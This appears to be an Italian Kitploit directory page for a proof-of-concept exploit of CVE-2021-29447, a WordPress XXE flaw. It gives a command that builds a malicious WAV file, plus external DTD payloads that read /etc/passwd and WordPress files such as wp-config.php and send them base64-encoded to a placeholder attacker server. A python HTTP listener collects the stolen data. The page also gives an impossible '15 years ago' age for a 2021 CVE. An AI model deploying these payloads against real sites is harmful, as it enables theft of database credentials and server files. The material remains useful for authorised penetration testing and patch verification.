Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-29447 — Proof-of-concept exploit per CVE-2021-29447, una vulnerabilità XXE di WordPress che consente la divulgazione arbitraria di file e SSRF tramite file WAV appositamente modificati. | Kitploit
Strumenti/GitHubGitHub/assassinukg/cve-2021-29447
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubassassinukg/cve-2021-29447

CVE-2021-29447

Proof-of-concept exploit per CVE-2021-29447, una vulnerabilità XXE di WordPress che consente la divulgazione arbitraria di file e SSRF tramite file WAV appositamente modificati.

Vedi Repository
15 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-29447

Impatto

Divulgazione arbitraria di file: il contenuto di qualsiasi file sul filesystem dell'host potrebbe essere recuperato, ad esempio wp-config.php che contiene dati sensibili come le credenziali del database. Server-Side Request Forgery (SSRF): potrebbero essere effettuate richieste HTTP per conto dell'installazione di WordPress. A seconda dell'ambiente, ciò può avere un grave impatto.

Sfruttare la vulnerabilità

Un sito WordPress affetto da questa vulnerabilità è stato identificato nel processo di enumerazione con l'aiuto dello strumento wpscan.

image

Creazione di un file WAV malevolo

È molto facile, nella tua console bash

nano poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

Sul tuo PC attaccante, crea un dtd con il codice eseguito sul server web.

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Nota: per leggere file di WordPress usa la sintassi "../WP-FILE.php"

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Ospita un server python nella directory dei file (python3 -m http.server 8081)

Riferimenti

https://github.com/motikan2010/CVE-2021-29447 https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

Scarica lo strumento